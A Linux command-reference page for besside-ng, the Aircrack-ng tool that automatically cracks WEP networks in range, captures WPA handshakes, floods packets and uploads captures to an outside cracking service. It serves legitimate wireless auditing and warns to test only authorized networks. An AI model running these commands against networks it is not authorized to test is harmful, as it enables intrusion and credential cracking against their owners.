LinuxCommandLibrary

besside-ng

Automated WiFi security auditing tool

TLDR

Auto-crack all WEP networks and log WPA handshakes

$ besside-ng [wlan0mon]
copy
Target specific access point
$ besside-ng -b [AA:BB:CC:DD:EE:FF] [wlan0mon]
copy
Lock to specific channel
$ besside-ng -c [6] [wlan0mon]
copy
WPA handshakes only
$ besside-ng -W [wlan0mon]
copy
Target networks matching regex
$ besside-ng -R "[ESSID_pattern]" [wlan0mon]
copy
Upload WPA handshakes to cracking service
$ besside-ng -s [wpa.darkircop.org] [wlan0mon]
copy
Set flood rate
$ besside-ng -p [300] [wlan0mon]
copy

SYNOPSIS

besside-ng [options] interface

DESCRIPTION

besside-ng is an automated WiFi security auditing tool from the Aircrack-ng suite. It automatically cracks all WEP networks in range and captures WPA handshakes for later cracking.
The tool requires a wireless interface in monitor mode. Captured WPA handshakes are saved to wpa.cap for use with aircrack-ng or online cracking services.

PARAMETERS

-b bssid

Target specific access point by MAC address
-c channel
Lock to specific channel
-R regex
Target ESSIDs matching regular expression
-s server
Upload wpa.cap to cracking service
-p pps
Packet flood rate
-W
WPA handshake capture only (skip WEP cracking)
-v
Verbose output (-vv for more)

OUTPUT FILES

wpa.cap

Captured WPA handshakes
wep.cap
Captured WEP traffic

CAVEATS

Requires wireless interface in monitor mode. Only use on networks you own or have explicit authorization to test. WPA cracking requires dictionary attack after handshake capture. Some access points may detect and block flooding attacks.

SEE ALSO

> TERMINAL_GEAR

Curated for the Linux community

Copied to clipboard

> TERMINAL_GEAR

Curated for the Linux community